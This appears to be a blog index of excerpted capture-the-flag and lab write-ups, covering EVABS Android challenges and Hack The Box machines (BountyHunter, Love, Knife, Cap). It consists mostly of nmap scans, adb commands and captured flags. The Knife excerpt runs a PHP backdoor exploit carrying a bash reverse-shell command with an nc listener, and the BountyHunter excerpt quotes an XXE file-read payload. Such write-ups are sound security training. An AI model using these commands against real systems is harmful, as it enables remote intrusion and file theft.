Pages

Search

EVABS Challenge 6

$adb shellvbox86p:/data/data/com.revo.evabs/databases # ls $adb pull /data/data/com.revo.evabs/databases/MAINFRAME_ACCESS . $ ls $ file MAINFRAME_ACCESS EVABS{sqlite_is_not_safe}

EVABS Challenge 5

$ adb shellvbox86p:/data/data/com.revo.evabs # ls vbox86p:/data/data/com.revo.evabs # cd shared_prefsvbox86p:/data/data/com.revo.evabs/shared_prefs # ls vbox86p:/data/data/com.revo.evabs/shared_prefs # cat DETAILS.xml EVABS{shar3d_pr3fs_c0uld_be_c0mpromiz3ds}

EVABS Challenge 4

EVABS{th!s_plac3_is_n0t_as_s3cur3_as_it_l00ks}

HTB BountyHunter

$ nmap -A 10.10.11.100 -T4 -v Open ports 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) http://10.10.11.100/ http://10.10.11.100/resources/README.txt http://10.10.11.100/portal.php http://10.10.11.100/log_submit.php As we can observe in Burp, data is URL+base64 encoded. It’s XML data, so could try an XXE. Using Cyberchef (https://gchq.github.io) on https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XXE%20Injection#classic-xxe we also find : <!DOCTYPE replace [<!ENTITY xxe SYSTEM «php://filter/convert.base64-encode/resource=file_to_use»> ]> We can use to check other files

EVABS Challenge 3

HTB Love

$ nmap -A -p- 10.10.10.239 -T4 Open ports: 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) 5040/tcp open unknown 5985/tcp open http Microsoft HTTPAPI httpd

EVABS Challenge 2

EABS{fil3s_!n_ass3ts_ar3_eas!ly_hackabl3}

HTB Knife

$ nmap 10.10.10.242 $ nmap 10.10.10.242 -p- -v http://10.10.10.242/ $ whatweb 10.10.10.242 $ searchsploit php 8.1.0-dev $ searchsploit -m php/webapps/49933.py $ python3 49933.py $ id Using this exploit we get a reverse but it is not very useful, we can try to get a better one.https://packetstormsecurity.com/files/162749/PHP-8.1.0-dev-Backdoor-Remote-Command-Injection.html $ python3 php_8.1.0-dev_exploit.py -u http://10.10.10.242/ -c «/bin/bash -c ‘/bin/bash -i >& /dev/tcp/10.10.14.7/4444 0>&1′»$ sudo nc -lvnp 4444 james@knife:/$ ls james@knife:/$ cd /homejames@knife:/home$ ls james@knife:/home$

EVABS (Extremely Vulnerable Android Labs) Challenge 1

According to https://github.com/abhi-r3v0/EVABS: An open source Android application that is intentionally vulnerable so as to act as a learning platform for Android application security beginners. The effort is to introduce beginners with very limited or zero knowledge to some of the major and commonly found real-world based Android application vulnerabilities in a story-based, interactive model. EVABS follows a level-wise difficulty approach and in each level, the player learns a new

HTB Cap

$ nmap -A -p- 10.10.10.245 -T4 -Pn Open ports : 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http gunicorn http://10.10.10.245/ Dashboard Security Snapshot IP Config Network status Security Snapshot http://10.10.10.245/data/1 Using Burp we can discover the content of the site and discover if there is anything else in content data. Using Burp Discover functionality we can obtain also if